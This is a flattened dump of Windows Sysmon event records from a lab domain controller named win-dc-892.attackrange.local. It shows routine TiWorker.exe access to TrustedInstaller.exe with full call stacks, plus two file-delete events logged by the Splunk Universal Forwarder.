12:02:25.356{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.356{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.356{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000005970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.356{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB71F914C4BEE1C51656184B2A63E45D,SHA256=8C6662A2245A56E3F1D726044E0674E5ED7CFF0F3762EFCB6F1352D27EC0C246,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.356{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.340{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.340{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.340{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.340{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.340{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.325{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.325{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.325{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.325{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000005959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.325{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D0B1EE1241F090367DFD8E54C38675E,SHA256=EC8A63B676A3306221E15AAC99CFB678A311D8D51419CE658BB1FF216EA95E6A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.309{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.309{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.309{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.293{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 